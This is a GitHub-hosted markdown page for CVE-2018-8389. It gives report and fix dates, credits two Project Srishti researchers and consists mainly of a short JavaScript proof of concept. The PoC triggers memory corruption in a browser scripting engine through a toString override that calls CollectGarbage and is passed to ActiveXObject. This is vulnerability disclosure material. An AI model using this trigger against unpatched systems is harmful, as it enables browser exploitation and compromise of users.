Skip to content

Latest commit

 

History

History
19 lines (14 loc) · 470 Bytes

CVE-2018-8389.md

File metadata and controls

19 lines (14 loc) · 470 Bytes

CVE-2018-8389

  • Report: Jan 2018
  • Fix: August 2018
  • Credit: Sudhakar Verma and Ashfaq Ansari - Project Srishti

PoC

var arr1 = new Object();
arr1.toString = function(){ CollectGarbage(); };
var arrs = new Array(0x7fff);
var z = new ActiveXObject(arrs, [arr1]);

Reference